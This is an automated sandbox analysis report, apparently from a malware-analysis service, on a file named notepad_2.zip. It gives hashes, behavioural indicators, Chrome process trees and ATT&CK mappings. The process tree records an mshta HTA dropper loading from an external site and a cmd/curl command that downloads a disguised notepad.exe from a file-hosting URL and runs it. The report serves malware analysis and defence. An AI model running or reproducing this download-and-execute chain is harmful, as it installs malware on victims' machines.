63b5d3c8355a4df0fd1e83caa6fc85ee3aeea1ef4f44cf431215ade6b1c2fbea

Analysis

max time kernel
106s
max time network
145s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
03/06/2024, 14:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

notepad_2.zip
Size

1KB
MD5

b39defe5cd732c3cc151dae24516b2c2
SHA1

35169a713cc05f4d29a0c9925a1cf8d8480d057e
SHA256

63b5d3c8355a4df0fd1e83caa6fc85ee3aeea1ef4f44cf431215ade6b1c2fbea
SHA512

a3b3b41828a97092dbfa1d8e4be7849d2febca993df50c85a8355392c4bd1d0fe04827ab872f47d16e3e0b984d70d697adb05cd9f0ceccd5ba9732c9a266e71f

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://ayzax.com/index.html

Signatures

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1592	chrome.exe
1592	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1908	7zFM.exe

Suspicious use of AdjustPrivilegeToken 47 IoCs

description	pid	Process
Token: SeRestorePrivilege	1908	7zFM.exe
Token: 35	1908	7zFM.exe
Token: SeSecurityPrivilege	1908	7zFM.exe
Token: SeSecurityPrivilege	1908	7zFM.exe
Token: SeSecurityPrivilege	1908	7zFM.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe
Token: SeShutdownPrivilege	1592	chrome.exe

Suspicious use of FindShellTrayWindow 38 IoCs

pid	Process
1908	7zFM.exe
1908	7zFM.exe
1908	7zFM.exe
1908	7zFM.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe
1592	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1592 wrote to memory of 2400	1592	chrome.exe	36
PID 1592 wrote to memory of 2400	1592	chrome.exe	36
PID 1592 wrote to memory of 2400	1592	chrome.exe	36
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2608	1592	chrome.exe	38
PID 1592 wrote to memory of 2364	1592	chrome.exe	39
PID 1592 wrote to memory of 2364	1592	chrome.exe	39
PID 1592 wrote to memory of 2364	1592	chrome.exe	39
PID 1592 wrote to memory of 2460	1592	chrome.exe	40
PID 1592 wrote to memory of 2460	1592	chrome.exe	40
PID 1592 wrote to memory of 2460	1592	chrome.exe	40
PID 1592 wrote to memory of 2460	1592	chrome.exe	40
PID 1592 wrote to memory of 2460	1592	chrome.exe	40
PID 1592 wrote to memory of 2460	1592	chrome.exe	40
PID 1592 wrote to memory of 2460	1592	chrome.exe	40
PID 1592 wrote to memory of 2460	1592	chrome.exe	40
PID 1592 wrote to memory of 2460	1592	chrome.exe	40
PID 1592 wrote to memory of 2460	1592	chrome.exe	40
PID 1592 wrote to memory of 2460	1592	chrome.exe	40
PID 1592 wrote to memory of 2460	1592	chrome.exe	40
PID 1592 wrote to memory of 2460	1592	chrome.exe	40
PID 1592 wrote to memory of 2460	1592	chrome.exe	40
PID 1592 wrote to memory of 2460	1592	chrome.exe	40
PID 1592 wrote to memory of 2460	1592	chrome.exe	40
PID 1592 wrote to memory of 2460	1592	chrome.exe	40
PID 1592 wrote to memory of 2460	1592	chrome.exe	40
PID 1592 wrote to memory of 2460	1592	chrome.exe	40

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\notepad_2.zip
1⤵
PID:2896

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\notepad_2.zip"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1908

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef5509758,0x7fef5509768,0x7fef5509778
  2⤵
  PID:2400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1152 --field-trial-handle=1116,i,2414287571023949273,5482304262795108069,131072 /prefetch:2
  2⤵
  PID:2608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 --field-trial-handle=1116,i,2414287571023949273,5482304262795108069,131072 /prefetch:8
  2⤵
  PID:2364
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1568 --field-trial-handle=1116,i,2414287571023949273,5482304262795108069,131072 /prefetch:8
  2⤵
  PID:2460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2280 --field-trial-handle=1116,i,2414287571023949273,5482304262795108069,131072 /prefetch:1
  2⤵
  PID:2468
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2288 --field-trial-handle=1116,i,2414287571023949273,5482304262795108069,131072 /prefetch:1
  2⤵
  PID:1504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1392 --field-trial-handle=1116,i,2414287571023949273,5482304262795108069,131072 /prefetch:2
  2⤵
  PID:2204
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2192 --field-trial-handle=1116,i,2414287571023949273,5482304262795108069,131072 /prefetch:1
  2⤵
  PID:2152
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3416 --field-trial-handle=1116,i,2414287571023949273,5482304262795108069,131072 /prefetch:8
  2⤵
  PID:2948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3468 --field-trial-handle=1116,i,2414287571023949273,5482304262795108069,131072 /prefetch:8
  2⤵
  PID:2976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3576 --field-trial-handle=1116,i,2414287571023949273,5482304262795108069,131072 /prefetch:8
  2⤵
  PID:2628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3880 --field-trial-handle=1116,i,2414287571023949273,5482304262795108069,131072 /prefetch:1
  2⤵
  PID:2744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3724 --field-trial-handle=1116,i,2414287571023949273,5482304262795108069,131072 /prefetch:8
  2⤵
  PID:2648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=2584 --field-trial-handle=1116,i,2414287571023949273,5482304262795108069,131072 /prefetch:1
  2⤵
  PID:272
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3920 --field-trial-handle=1116,i,2414287571023949273,5482304262795108069,131072 /prefetch:8
  2⤵
  PID:1384

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:740

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://ayzax.com/index.html
1⤵
PID:2868
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c curl.exe https://download1587.mediafire.com/v7nljip47mug_sYkAGIJJixUG-GRANWoTVdf2qA8WvXsv_89h8YzbqNPhHjG0bZmoZRTn7E6igR-uBI_vTiLg1-JzO3i7MfPCw-5zZk-Yiu0I0T5N3Gsxs33J4Cu0fEBrjrt8j_SbwG1vF_V-I2Nfsw8O3C-248SgxQHEv7gNqqi/wjesscbmm8mchg1/Notepad.exe --output C:\Users\Admin\AppData\Roaming\\notepad.exe && C:\Users\Admin\AppData\Roaming\\notepad.exe
  2⤵
  PID:2652

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1015B

MD5
bfd627c334a46ae028723b4056142ef8

SHA1
52d21d03531f98597745580a83b6766e71aa687f

SHA256
855663e96eae1567248a48588b6492d3f513be3cb39e89a7cb4a95d570e1d38c

SHA512
fd0caef2fa83a0620d4cae694260837ac05049c0737e2b5b7a314e9677fab8bbba3483e16051ed838aa97720b2eebc64efb692e703bc1dfa8ea8fb81aa310f70

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
363B

MD5
eee0a820acfbfdc59a201ea7891bc2aa

SHA1
5a3e426fd13dfdab2f9c30597ae40135d0387467

SHA256
59c0e505d8a6a192b5e85c30a211feb436a85b20deff20208f5b81efe70cee63

SHA512
b5df078bec104150857809a132b352673a783cfe11aab80b943dee7cfb58347873c98d8db8921d1ac1972255f4e09406fd38be36004a32de7f047f06fd116abe

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1015B

MD5
65385ebc02a9923c7f78a0c3b38999d8

SHA1
9ca57e250d2c0be1b668e5d7434e42d4a4e6e2a6

SHA256
cab3ad5af2f7e219f0b4ddf705347bbf221002b1e5d480d84fb6ec29a1918439

SHA512
05d4c3d1da05a676131496c549cc3a56c2b47e601952b0a36106d7da5b6d4115540130f0bfadc42d854375c3f0cd81aac806931103aa150fb00e60162d436f41

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
abb45bffe61abc723a6e0dd0ca97b749

SHA1
c7a6a5ed84c879518a404a2d90894a71ec266209

SHA256
3e266901d0bf58398abe9958f0f9bd479711289ec40ca2e09ceaf7d4c79770fe

SHA512
104cad72df4686c41f46b70fe5023c1ff9e4e5307d19cebebb4c4c425d4fe9537d44bf911ef903c57c4143592bbda76d1d5605dda27ac3b5e661220e2c74c291

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
51323f7ae8da870cbc896d04f36b42ec

SHA1
c0a2235ff47f6feeddf4a6c967168081860de03f

SHA256
3793806d298195cc1b866cf6249cc56ee45eee5caf598b161e2f1a8201d17d04

SHA512
dfc07cba5187da01a8fc85ba61c672b773e4eb9679c580270ab0ddcd06af3325f8829bc166a1ff315613c5e77e4ce8556de15faa40af09429b1ec078756b7064

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
ec2792dc59a180e040a441e2cb2ecb53

SHA1
41fe3a3b1f1919c34b8463103b8e788347bc658d

SHA256
857d2e46d2fbe5b1321c32fdd389b26a6ed60bc3496c8765ce9628d0169758f5

SHA512
cd6eef1894acc8e3e1a03aa3d62b9feb6a300f3be30a04cea5b72e4f061446e454a48b2a660ab9af38001dc36c2fbf5ed7f9b56f183b2760a9b639cbd7415670

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

Filesize
16B

MD5
18e723571b00fb1694a3bad6c78e4054

SHA1
afcc0ef32d46fe59e0483f9a3c891d3034d12f32

SHA256
8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

SHA512
43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

Download Submit